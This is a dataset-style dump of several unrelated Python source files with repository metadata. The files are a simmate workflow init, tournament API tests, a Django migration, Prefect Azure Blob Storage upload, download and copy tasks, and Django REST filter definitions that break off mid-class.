| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
dfb4c5e767016cd9c245b4f5a37516e8be3065f8
| 259
|
py
|
Python
|
src/simmate/calculators/vasp/workflows/nudged_elastic_band/__init__.py
|
laurenmm/simmate-1
|
c06b94c46919b01cda50f78221ad14f75c100a14
|
[
"BSD-3-Clause"
] | 9
|
2021-12-21T02:58:21.000Z
|
2022-01-25T14:00:06.000Z
|
src/simmate/calculators/vasp/workflows/nudged_elastic_band/__init__.py
|
laurenmm/simmate-1
|
c06b94c46919b01cda50f78221ad14f75c100a14
|
[
"BSD-3-Clause"
] | 51
|
2022-01-01T15:59:58.000Z
|
2022-03-26T21:25:42.000Z
|
src/simmate/calculators/vasp/workflows/nudged_elastic_band/__init__.py
|
laurenmm/simmate-1
|
c06b94c46919b01cda50f78221ad14f75c100a14
|
[
"BSD-3-Clause"
] | 7
|
2022-01-01T03:44:32.000Z
|
2022-03-29T19:59:27.000Z
|
# -*- coding: utf-8 -*-
from .all_paths import workflow as all_paths_workflow
from .single_path import workflow as single_path_workflow
from .from_endpoints import workflow as from_endpoints_workflow
from .from_images import workflow as from_images_workflow
| 37
| 63
| 0.833977
| 39
| 259
| 5.230769
| 0.333333
| 0.27451
| 0.313725
| 0.196078
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.004367
| 0.11583
| 259
| 6
| 64
| 43.166667
| 0.886463
| 0.081081
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
dfe0737bf6eeb4de83ec2d23233f9d64bb58bb5e
| 1,990
|
py
|
Python
|
test/.ipynb_checkpoints/test_tournament-checkpoint.py
|
fernanlukban/pantheon
|
4b3d7894dc7f72ba7b71bcb98e9d6dd4645d060a
|
[
"MIT"
] | 52
|
2018-04-24T15:30:02.000Z
|
2022-02-22T11:05:27.000Z
|
test/.ipynb_checkpoints/test_tournament-checkpoint.py
|
fernanlukban/pantheon
|
4b3d7894dc7f72ba7b71bcb98e9d6dd4645d060a
|
[
"MIT"
] | 8
|
2020-09-18T04:00:21.000Z
|
2022-03-22T00:01:20.000Z
|
test/.ipynb_checkpoints/test_tournament-checkpoint.py
|
fernanlukban/pantheon
|
4b3d7894dc7f72ba7b71bcb98e9d6dd4645d060a
|
[
"MIT"
] | 14
|
2019-01-03T13:09:36.000Z
|
2022-03-05T17:13:45.000Z
|
from .config import *
def test_providers():
    """Register a tournament provider and verify an integer provider id comes back."""
    try:
        data = loop.run_until_complete(
            panth.registerProvider(tournament_region, tournament_url, stub)
        )
    except exc.Unauthorized:
        pytest.skip("API key unauthorized for tournament")
    except Exception as e:
        # Previously this branch only printed the error, leaving `data`
        # unbound so the assert below raised a confusing NameError.
        pytest.fail("registerProvider raised: {}".format(e))
    assert isinstance(data, int)
def test_tournaments():
    """Register a tournament and verify an integer tournament id comes back."""
    try:
        data = loop.run_until_complete(
            panth.registerTournament(provider_id, tournament_name, stub)
        )
    except exc.Unauthorized:
        pytest.skip("API key unauthorized for tournament")
    except Exception as e:
        # Previously this branch only printed the error, leaving `data`
        # unbound so the assert below raised a confusing NameError.
        pytest.fail("registerTournament raised: {}".format(e))
    assert isinstance(data, int)
def test_code():
    """Create a single tournament code and verify exactly one code is returned."""
    data_input = {
        "mapType": "SUMMONERS_RIFT",
        "metadata": "",
        "pickType": "BLIND_PICK",
        "spectatorType": "NONE",
        "teamSize": 5,
    }
    try:
        data = loop.run_until_complete(
            panth.createTournamentCode(tournament_id, data_input, 1, stub)
        )
    except exc.Unauthorized:
        pytest.skip("API key unauthorized for tournament")
    except Exception as e:
        # Previously this branch only printed the error, leaving `data`
        # unbound so the asserts below raised a confusing NameError.
        pytest.fail("createTournamentCode raised: {}".format(e))
    assert isinstance(data, list)
    assert len(data) == 1
def test_multiple_codes():
    """Create five tournament codes and verify exactly five codes are returned."""
    data_input = {
        "mapType": "SUMMONERS_RIFT",
        "metadata": "",
        "pickType": "BLIND_PICK",
        "spectatorType": "NONE",
        "teamSize": 5,
    }
    try:
        data = loop.run_until_complete(
            panth.createTournamentCode(tournament_id, data_input, 5, stub)
        )
    except exc.Unauthorized:
        pytest.skip("API key unauthorized for tournament")
    except Exception as e:
        # Previously this branch only printed the error, leaving `data`
        # unbound so the asserts below raised a confusing NameError.
        pytest.fail("createTournamentCode raised: {}".format(e))
    assert isinstance(data, list)
    assert len(data) == 5
def test_lobby():
    """Fetch lobby events for the provider and verify the response shape."""
    try:
        data = loop.run_until_complete(panth.getLobbyEvents(provider_id, stub))
    except exc.Unauthorized:
        pytest.skip("API key unauthorized for tournament")
    except Exception as e:
        # Previously this branch only printed the error, leaving `data`
        # unbound so the asserts below raised a confusing NameError.
        pytest.fail("getLobbyEvents raised: {}".format(e))
    assert "eventList" in data
    assert isinstance(data["eventList"], list)
| 27.638889
| 103
| 0.628141
| 233
| 1,990
| 5.23176
| 0.261803
| 0.02461
| 0.045119
| 0.057424
| 0.806399
| 0.806399
| 0.806399
| 0.727646
| 0.727646
| 0.727646
| 0
| 0.004104
| 0.265327
| 1,990
| 72
| 104
| 27.638889
| 0.829685
| 0
| 0
| 0.706897
| 0
| 0
| 0.169262
| 0
| 0
| 0
| 0
| 0
| 0.137931
| 1
| 0.086207
| false
| 0
| 0.017241
| 0
| 0.103448
| 0.086207
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
dffd4cb39c8478c3d645841c8b497e789e077f61
| 1,916
|
py
|
Python
|
src/magazine/migrations/0003_auto_20160114_1432.py
|
Busaka/excellence
|
1cd19770285584d61aeddd77d6c1dd83e2fd04ba
|
[
"MIT"
] | null | null | null |
src/magazine/migrations/0003_auto_20160114_1432.py
|
Busaka/excellence
|
1cd19770285584d61aeddd77d6c1dd83e2fd04ba
|
[
"MIT"
] | null | null | null |
src/magazine/migrations/0003_auto_20160114_1432.py
|
Busaka/excellence
|
1cd19770285584d61aeddd77d6c1dd83e2fd04ba
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Generated by Django 1.9 on 2016-01-14 14:32
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add the 'eleven' and 'twelve' paragraph fields for heading levels
    h2 through h6 to the Article model (10 optional text fields in total)."""

    dependencies = [
        ('magazine', '0002_auto_20160114_1415'),
    ]

    # The ten AddField operations differ only in heading level and ordinal,
    # so they are generated in the same order the original listed them:
    # h2_eleven, h2_twelve, h3_eleven, ... h6_twelve.
    operations = [
        migrations.AddField(
            model_name='article',
            name='h{}_paragraph_{}'.format(level, ordinal),
            field=models.TextField(blank=True),
        )
        for level in range(2, 7)
        for ordinal in ('eleven', 'twelve')
    ]
| 29.030303
| 48
| 0.557933
| 176
| 1,916
| 5.857955
| 0.261364
| 0.174588
| 0.223084
| 0.261882
| 0.814743
| 0.814743
| 0.814743
| 0.780795
| 0.740058
| 0.740058
| 0
| 0.031956
| 0.330376
| 1,916
| 65
| 49
| 29.476923
| 0.771629
| 0.033925
| 0
| 0.689655
| 1
| 0
| 0.157468
| 0.012446
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.034483
| 0
| 0.086207
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
5f112059bdc99ece0bdb018cc3c05cd65e6c8299
| 212
|
py
|
Python
|
mmrotate/core/patch/__init__.py
|
Justice-Eternal/mmrotate
|
c5bf348562fd84cc17906c2cf370d1a49fcd3035
|
[
"Apache-2.0"
] | 449
|
2022-02-18T08:26:58.000Z
|
2022-03-31T11:58:32.000Z
|
mmrotate/core/patch/__init__.py
|
Justice-Eternal/mmrotate
|
c5bf348562fd84cc17906c2cf370d1a49fcd3035
|
[
"Apache-2.0"
] | 162
|
2022-02-18T09:54:46.000Z
|
2022-03-31T15:40:46.000Z
|
mmrotate/core/patch/__init__.py
|
Justice-Eternal/mmrotate
|
c5bf348562fd84cc17906c2cf370d1a49fcd3035
|
[
"Apache-2.0"
] | 98
|
2022-02-18T08:28:48.000Z
|
2022-03-31T08:52:11.000Z
|
# Copyright (c) OpenMMLab. All rights reserved.
from .merge_results import merge_results
from .split import get_multiscale_patch, slide_window

# Public API of this subpackage: the names re-exported for wildcard imports.
__all__ = ['merge_results', 'get_multiscale_patch', 'slide_window']
| 35.333333
| 67
| 0.806604
| 28
| 212
| 5.642857
| 0.571429
| 0.227848
| 0.227848
| 0.291139
| 0.367089
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.103774
| 212
| 5
| 68
| 42.4
| 0.831579
| 0.212264
| 0
| 0
| 0
| 0
| 0.272727
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
5f240e813277187c28fe1df764f4d1bbc0e1c0e4
| 297
|
py
|
Python
|
tests/parser/choice.5.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
tests/parser/choice.5.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
tests/parser/choice.5.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
# Parser round-trip fixture: the same ASP program is expected back unchanged,
# so a single shared literal feeds both the input and the expected output.
_program = """
% This would (have) trigger(ed) inferences from dynamic constraints.
x | y.
a :- not x.
b :- not x.
c :- b.
a :- not c.
"""

input = _program  # name mandated by the test harness (shadows the builtin)
output = _program
| 12.913043
| 69
| 0.52862
| 46
| 297
| 3.413043
| 0.369565
| 0.101911
| 0.165605
| 0.254777
| 0.929936
| 0.929936
| 0.929936
| 0.929936
| 0.929936
| 0.929936
| 0
| 0
| 0.289562
| 297
| 22
| 70
| 13.5
| 0.744076
| 0
| 0
| 0.875
| 0
| 0
| 0.888889
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
5f351157258d99eb646bcddf794c94291a783d05
| 9,492
|
py
|
Python
|
src/prefect/tasks/azure/blobstorage.py
|
dazzag24/prefect
|
9d36c989c95cbbed091b071932553286edf25bb6
|
[
"Apache-2.0"
] | null | null | null |
src/prefect/tasks/azure/blobstorage.py
|
dazzag24/prefect
|
9d36c989c95cbbed091b071932553286edf25bb6
|
[
"Apache-2.0"
] | null | null | null |
src/prefect/tasks/azure/blobstorage.py
|
dazzag24/prefect
|
9d36c989c95cbbed091b071932553286edf25bb6
|
[
"Apache-2.0"
] | null | null | null |
import uuid
import azure.storage.blob
from prefect import Task
from prefect.client import Secret
from prefect.utilities.tasks import defaults_from_attrs
class BlobStorageDownload(Task):
    """
    Task for downloading data from a Blob Storage container and returning it as a string.
    Note that all initialization arguments can optionally be provided or overwritten at runtime.
    Args:
        - azure_credentials_secret (str, optional): the name of the Prefect Secret
            that stores your Azure credentials; this Secret must be a JSON string
            with two keys: `ACCOUNT_NAME` and `ACCOUNT_KEY` (or `SAS_TOKEN`)
        - container (str, optional): the name of the Azure Blob Storage to download from
        - **kwargs (dict, optional): additional keyword arguments to pass to the
            Task constructor
    """

    def __init__(
        self,
        azure_credentials_secret: str = "AZ_CREDENTIALS",
        container: str = None,
        **kwargs
    ) -> None:
        self.azure_credentials_secret = azure_credentials_secret
        self.container = container
        super().__init__(**kwargs)

    @defaults_from_attrs("azure_credentials_secret", "container")
    def run(
        self,
        blob_name: str,
        azure_credentials_secret: str = "AZ_CREDENTIALS",
        container: str = None,
    ) -> str:
        """
        Task run method.
        Args:
            - blob_name (str): the name of the blob within this container to retrieve
            - azure_credentials_secret (str, optional): the name of the Prefect Secret
                that stores your Azure credentials; this Secret must be a JSON string
                with two keys: `ACCOUNT_NAME` and `ACCOUNT_KEY` (or `SAS_TOKEN`)
            - container (str, optional): the name of the Blob Storage container to download from
        Returns:
            - str: the contents of this blob_name / container, as a string
        Raises:
            - ValueError: if no container is provided, or the secret holds
                neither ACCOUNT_KEY nor SAS_TOKEN
        """
        if container is None:
            raise ValueError("A container name must be provided.")

        # get Azure credentials
        azure_credentials = Secret(azure_credentials_secret).get()
        az_account_name = azure_credentials["ACCOUNT_NAME"]
        # Initialize both auth values so `az_sas_token is None` below is safe
        # regardless of which credential was supplied; previously an
        # ACCOUNT_KEY-only secret raised UnboundLocalError on az_sas_token.
        az_account_key = None
        az_sas_token = None
        if 'ACCOUNT_KEY' in azure_credentials:
            az_account_key = azure_credentials["ACCOUNT_KEY"]
        elif 'SAS_TOKEN' in azure_credentials:
            az_sas_token = azure_credentials["SAS_TOKEN"]
        else:
            raise ValueError("One of either ACCOUNT_KEY or SAS_TOKEN must be provided in the azure_credentials_secret.")

        # Authenticate with whichever credential form the secret provided.
        if az_sas_token is None:
            blob_service = azure.storage.blob.BlockBlobService(
                account_name=az_account_name, account_key=az_account_key
            )
        else:
            blob_service = azure.storage.blob.BlockBlobService(
                account_name=az_account_name, sas_token=az_sas_token
            )

        blob_result = blob_service.get_blob_to_text(
            container_name=container, blob_name=blob_name
        )
        content_string = blob_result.content
        return content_string
class BlobStorageUpload(Task):
    """
    Task for uploading string data (e.g., a JSON string) to an Azure Blob Storage container.
    Note that all initialization arguments can optionally be provided or overwritten at runtime.
    Args:
        - azure_credentials_secret (str, optional): the name of the Prefect Secret
            that stores your Azure credentials; this Secret must be a JSON string
            with two keys: `ACCOUNT_NAME` and `ACCOUNT_KEY` (or `SAS_TOKEN`)
        - container (str, optional): the name of the Azure Blob Storage to upload to
        - **kwargs (dict, optional): additional keyword arguments to pass to the
            Task constructor
    """

    def __init__(
        self,
        azure_credentials_secret: str = "AZ_CREDENTIALS",
        container: str = None,
        **kwargs
    ) -> None:
        self.azure_credentials_secret = azure_credentials_secret
        self.container = container
        super().__init__(**kwargs)

    @defaults_from_attrs("azure_credentials_secret", "container")
    def run(
        self,
        data: str,
        blob_name: str = None,
        azure_credentials_secret: str = "AZ_CREDENTIALS",
        container: str = None,
    ) -> str:
        """
        Task run method.
        Args:
            - data (str): the data payload to upload
            - blob_name (str, optional): the name to upload the data under; if not
                provided, a random `uuid` will be created
            - azure_credentials_secret (str, optional): the name of the Prefect Secret
                that stores your Azure credentials; this Secret must be a JSON string
                with two keys: `ACCOUNT_NAME` and `ACCOUNT_KEY` (or `SAS_TOKEN`)
            - container (str, optional): the name of the Blob Storage container to upload to
        Returns:
            - str: the name of the blob the data payload was uploaded to
        Raises:
            - ValueError: if no container is provided, or the secret holds
                neither ACCOUNT_KEY nor SAS_TOKEN
        """
        if container is None:
            raise ValueError("A container name must be provided.")

        ## get Azure credentials
        azure_credentials = Secret(azure_credentials_secret).get()
        az_account_name = azure_credentials["ACCOUNT_NAME"]
        # Initialize both auth values so `az_sas_token is None` below is safe
        # regardless of which credential was supplied; previously an
        # ACCOUNT_KEY-only secret raised UnboundLocalError on az_sas_token.
        az_account_key = None
        az_sas_token = None
        if 'ACCOUNT_KEY' in azure_credentials:
            az_account_key = azure_credentials["ACCOUNT_KEY"]
        elif 'SAS_TOKEN' in azure_credentials:
            az_sas_token = azure_credentials["SAS_TOKEN"]
        else:
            raise ValueError("One of either ACCOUNT_KEY or SAS_TOKEN must be provided in the azure_credentials_secret.")

        # Authenticate with whichever credential form the secret provided.
        if az_sas_token is None:
            blob_service = azure.storage.blob.BlockBlobService(
                account_name=az_account_name, account_key=az_account_key
            )
        else:
            blob_service = azure.storage.blob.BlockBlobService(
                account_name=az_account_name, sas_token=az_sas_token
            )

        ## create key if not provided
        if blob_name is None:
            blob_name = str(uuid.uuid4())

        blob_service.create_blob_from_text(
            container_name=container, blob_name=blob_name, text=data
        )
        return blob_name
class BlobStorageCopy(Task):
    """
    Task for copying a blob object to the same or new Azure Blob Storage container.
    Note that all initialization arguments can optionally be provided or overwritten at runtime.
    Args:
        - azure_credentials_secret (str, optional): the name of the Prefect Secret
            that stores your Azure credentials; this Secret must be a JSON string
            with two keys: `ACCOUNT_NAME` and `ACCOUNT_KEY` (or `SAS_TOKEN`)
        - container (str, optional): the name of the Azure Blob Storage to upload to
        - **kwargs (dict, optional): additional keyword arguments to pass to the
            Task constructor
    """

    def __init__(
        self,
        azure_credentials_secret: str = "AZ_CREDENTIALS",
        container: str = None,
        **kwargs
    ) -> None:
        self.azure_credentials_secret = azure_credentials_secret
        self.container = container
        super().__init__(**kwargs)

    @defaults_from_attrs("azure_credentials_secret", "container")
    def run(
        self,
        blob_name: str = None,
        target_blob_name: str = None,
        azure_credentials_secret: str = "AZ_CREDENTIALS",
        container: str = None,
        target_container: str = None,
    ) -> str:
        """
        Task run method.
        Args:
            - blob_name (str, optional): the name of the source blob to copy
            - target_blob_name (str, optional): the name to copy the blob to
            - azure_credentials_secret (str, optional): the name of the Prefect Secret
                that stores your Azure credentials; this Secret must be a JSON string
                with two keys: `ACCOUNT_NAME` and `ACCOUNT_KEY` (or `SAS_TOKEN`)
            - container (str, optional): the name of the source Blob Storage container
            - target_container (str, optional): the container to copy into; defaults
                to the source container when not provided
        Returns:
            - str: the name of the blob the data payload was copied to
        Raises:
            - ValueError: if no container is provided, or the secret holds
                neither ACCOUNT_KEY nor SAS_TOKEN
        """
        if container is None:
            raise ValueError("A container name must be provided.")

        ## get Azure credentials
        azure_credentials = Secret(azure_credentials_secret).get()
        az_account_name = azure_credentials["ACCOUNT_NAME"]
        # Initialize both auth values so `az_sas_token is None` below is safe
        # regardless of which credential was supplied; previously an
        # ACCOUNT_KEY-only secret raised UnboundLocalError on az_sas_token.
        az_account_key = None
        az_sas_token = None
        if 'ACCOUNT_KEY' in azure_credentials:
            az_account_key = azure_credentials["ACCOUNT_KEY"]
        elif 'SAS_TOKEN' in azure_credentials:
            az_sas_token = azure_credentials["SAS_TOKEN"]
        else:
            raise ValueError("One of either ACCOUNT_KEY or SAS_TOKEN must be provided in the azure_credentials_secret.")

        # Authenticate with whichever credential form the secret provided.
        if az_sas_token is None:
            blob_service = azure.storage.blob.BlockBlobService(
                account_name=az_account_name, account_key=az_account_key
            )
        else:
            blob_service = azure.storage.blob.BlockBlobService(
                account_name=az_account_name, sas_token=az_sas_token
            )

        # Same-container copy when no explicit target is given.
        if target_container is None:
            target_container = container

        blob_url = blob_service.make_blob_url(container, blob_name)
        print("Copying from {} to {}/{}".format(blob_url, target_container, target_blob_name))
        blob_service.copy_blob(
            target_container,
            target_blob_name,
            blob_url
            #f"https://{az_account_name}.blob.core.windows.net/{container}/{blob_name}"
        )
        return target_blob_name
| 38.274194
| 120
| 0.64075
| 1,145
| 9,492
| 5.082969
| 0.110044
| 0.148454
| 0.113402
| 0.030928
| 0.842096
| 0.842096
| 0.828007
| 0.828007
| 0.813574
| 0.813574
| 0
| 0.000149
| 0.291825
| 9,492
| 247
| 121
| 38.42915
| 0.865665
| 0.367994
| 0
| 0.708955
| 0
| 0
| 0.130997
| 0.026415
| 0
| 0
| 0
| 0
| 0
| 1
| 0.044776
| false
| 0
| 0.037313
| 0
| 0.126866
| 0.007463
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a07d7dfc6af1a4630b4545bea05caab41974cdd4
| 211
|
py
|
Python
|
baselines/baselines_common/__init__.py
|
Shmuma/Run-Skeleton-Run
|
a953e6c524a444b6a99a54ef5b2886a57de0d185
|
[
"MIT"
] | 92
|
2017-11-16T00:51:27.000Z
|
2021-05-09T14:09:08.000Z
|
baselines/baselines_common/__init__.py
|
bsivanantham/Run-Skeleton-Run
|
07e2ec2cffb638b03070422328faf07ab69c70bd
|
[
"MIT"
] | 4
|
2017-12-19T13:19:18.000Z
|
2018-02-26T12:18:11.000Z
|
baselines/baselines_common/__init__.py
|
bsivanantham/Run-Skeleton-Run
|
07e2ec2cffb638b03070422328faf07ab69c70bd
|
[
"MIT"
] | 18
|
2017-11-16T10:07:03.000Z
|
2021-10-15T04:26:48.000Z
|
from baselines.baselines_common.console_util import *
from baselines.baselines_common.dataset import Dataset
from baselines.baselines_common.math_util import *
from baselines.baselines_common.misc_util import *
| 42.2
| 54
| 0.872038
| 28
| 211
| 6.321429
| 0.321429
| 0.293785
| 0.497175
| 0.632768
| 0.429379
| 0.429379
| 0
| 0
| 0
| 0
| 0
| 0
| 0.075829
| 211
| 4
| 55
| 52.75
| 0.907692
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
a097b4c2e1a0d49f37ac0f9c33fcf1ba185d8f19
| 22,355
|
py
|
Python
|
creel_portal/api/filters/FishAttr_Filter.py
|
AdamCottrill/CreelPortal
|
5ec867c4f11b4231c112e8209116b6b96c2830ec
|
[
"MIT"
] | null | null | null |
creel_portal/api/filters/FishAttr_Filter.py
|
AdamCottrill/CreelPortal
|
5ec867c4f11b4231c112e8209116b6b96c2830ec
|
[
"MIT"
] | null | null | null |
creel_portal/api/filters/FishAttr_Filter.py
|
AdamCottrill/CreelPortal
|
5ec867c4f11b4231c112e8209116b6b96c2830ec
|
[
"MIT"
] | null | null | null |
import django_filters
from .filter_utils import ValueInFilter
class FishAttrFilters(django_filters.FilterSet):
"""A filter set that contains filters that are common to all the FN125 child
tables - FN125Lamprey, FN125Tag, Fn126, and FN127. Filtersets for those class
inherit from this one, and add their own models and model specific filters.
Filters in this class include filters from FN011 to FN125 Tables,
plus those associated with the design tables.
"""
tlen = django_filters.NumberFilter(
field_name="fish__tlen"
) # , lookup_expr="exact")
tlen__gte = django_filters.NumberFilter(field_name="fish__tlen", lookup_expr="gte")
tlen__lte = django_filters.NumberFilter(field_name="fish__tlen", lookup_expr="lte")
tlen__gt = django_filters.NumberFilter(field_name="fish__tlen", lookup_expr="gt")
tlen__lt = django_filters.NumberFilter(field_name="fish__tlen", lookup_expr="lt")
flen = django_filters.NumberFilter(field_name="fish__flen")
flen__gte = django_filters.NumberFilter(field_name="fish__flen", lookup_expr="gte")
flen__lte = django_filters.NumberFilter(field_name="fish__flen", lookup_expr="lte")
flen__gt = django_filters.NumberFilter(field_name="fish__flen", lookup_expr="gt")
flen__lt = django_filters.NumberFilter(field_name="fish__flen", lookup_expr="lt")
rwt = django_filters.NumberFilter(field_name="fish__rwt")
rwt__null = django_filters.BooleanFilter(
field_name="fish__rwt", lookup_expr="isnull"
)
rwt__gte = django_filters.NumberFilter(field_name="fish__rwt", lookup_expr="gte")
rwt__lte = django_filters.NumberFilter(field_name="fish__rwt", lookup_expr="lte")
rwt__gt = django_filters.NumberFilter(field_name="fish__rwt", lookup_expr="gt")
rwt__lt = django_filters.NumberFilter(field_name="fish__rwt", lookup_expr="lt")
mat = ValueInFilter(field_name="fish__mat")
mat__not = ValueInFilter(field_name="fish__mat", exclude=True)
mat__null = django_filters.BooleanFilter(
field_name="fish__mat", lookup_expr="isnull"
)
gon = ValueInFilter(field_name="fish__gon")
gon__not = ValueInFilter(field_name="fish__gon", exclude=True)
gon__null = django_filters.BooleanFilter(
field_name="fish__gon", lookup_expr="isnull"
)
sex = ValueInFilter(field_name="fish__sex")
sex__not = ValueInFilter(field_name="fish__sex", exclude=True)
sex__null = django_filters.BooleanFilter(
field_name="fish__sex", lookup_expr="isnull"
)
clipc = ValueInFilter(field_name="fish__clipc")
clipc__not = ValueInFilter(field_name="fish__clipc", exclude=True)
clipc__null = django_filters.BooleanFilter(
field_name="fish__clipc", lookup_expr="isnull"
)
clipc__like = django_filters.CharFilter(
field_name="fish__clipc", lookup_expr="icontains"
)
clipc__not_like = django_filters.CharFilter(
field_name="fish__clipc", lookup_expr="icontains", exclude=True
)
fate = ValueInFilter(field_name="fish__fate")
fate__not = ValueInFilter(field_name="fish__fate", exclude=True)
fate__null = django_filters.BooleanFilter(
field_name="fish__fate", lookup_expr="isnull"
)
agest__like = django_filters.CharFilter(
field_name="fish__agest", lookup_expr="icontains"
)
# CATCH ATTRIBUTES
spc = ValueInFilter(field_name="fish__catch__species__spc")
spc__not = ValueInFilter(field_name="fish__catch__species__spc", exclude=True)
grp = ValueInFilter(field_name="fish__catch__grp")
grp__not = ValueInFilter(field_name="fish__catch__grp", exclude=True)
sek = django_filters.BooleanFilter(field_name="fish__catch__sek")
hsvcnt = django_filters.CharFilter(
field_name="fish__catch__hsvcnt", lookup_expr="exact"
)
hsvcnt__gte = django_filters.NumberFilter(
field_name="fish__catch__hsvcnt", lookup_expr="gte"
)
hsvcnt__lte = django_filters.NumberFilter(
field_name="fish__catch__hsvcnt", lookup_expr="lte"
)
hsvcnt__gt = django_filters.NumberFilter(
field_name="fish__catch__hsvcnt", lookup_expr="gt"
)
hsvcnt__lt = django_filters.NumberFilter(
field_name="fish__catch__hsvcnt", lookup_expr="lt"
)
rlscnt = django_filters.CharFilter(
field_name="fish__catch__rlscnt", lookup_expr="exact"
)
rlscnt__gte = django_filters.NumberFilter(
field_name="fish__catch__rlscnt", lookup_expr="gte"
)
rlscnt__lte = django_filters.NumberFilter(
field_name="fish__catch__rlscnt", lookup_expr="lte"
)
rlscnt__gt = django_filters.NumberFilter(
field_name="fish__catch__rlscnt", lookup_expr="gt"
)
rlscnt__lt = django_filters.NumberFilter(
field_name="fish__catch__rlscnt", lookup_expr="lt"
)
mescnt = django_filters.CharFilter(
field_name="fish__catch__mescnt", lookup_expr="exact"
)
mescnt__gte = django_filters.NumberFilter(
field_name="fish__catch__mescnt", lookup_expr="gte"
)
mescnt__lte = django_filters.NumberFilter(
field_name="fish__catch__mescnt", lookup_expr="lte"
)
mescnt__gt = django_filters.NumberFilter(
field_name="fish__catch__mescnt", lookup_expr="gt"
)
mescnt__lt = django_filters.NumberFilter(
field_name="fish__catch__mescnt", lookup_expr="lt"
)
# INTERVIEW ATTRIBUTES:
itvtm0 = django_filters.TimeFilter(
field_name="fish__catch__interview__itvtm0", help_text="format: HH:MM"
)
itvtm0__gte = django_filters.TimeFilter(
field_name="fish__catch__interview__itvtm0",
lookup_expr="gte",
help_text="format: HH:MM",
)
itvtm0__lte = django_filters.TimeFilter(
field_name="fish__catch__interview__itvtm0",
lookup_expr="lte",
help_text="format: HH:MM",
)
itvtm0__gt = django_filters.TimeFilter(
field_name="fish__catch__interview__itvtm0",
lookup_expr="gt",
help_text="format: HH:MM",
)
itvtm0__lt = django_filters.TimeFilter(
field_name="fish__catch__interview__itvtm0",
lookup_expr="lt",
help_text="format: HH:MM",
)
efftm0 = django_filters.TimeFilter(
field_name="fish__catch__interview__efftm0", help_text="format: HH:MM"
)
efftm0__gte = django_filters.TimeFilter(
field_name="fish__catch__interview__efftm0",
lookup_expr="gte",
help_text="format: HH:MM",
)
efftm0__lte = django_filters.TimeFilter(
field_name="fish__catch__interview__efftm0",
lookup_expr="lte",
help_text="format: HH:MM",
)
efftm0__gt = django_filters.TimeFilter(
field_name="fish__catch__interview__efftm0",
lookup_expr="gt",
help_text="format: HH:MM",
)
efftm0__lt = django_filters.TimeFilter(
field_name="fish__catch__interview__efftm0",
lookup_expr="lt",
help_text="format: HH:MM",
)
efftm1 = django_filters.TimeFilter(
field_name="fish__catch__interview__efftm1", help_text="format: HH:MM"
)
efftm1__gte = django_filters.TimeFilter(
field_name="fish__catch__interview__efftm1",
lookup_expr="gte",
help_text="format: HH:MM",
)
efftm1__lte = django_filters.TimeFilter(
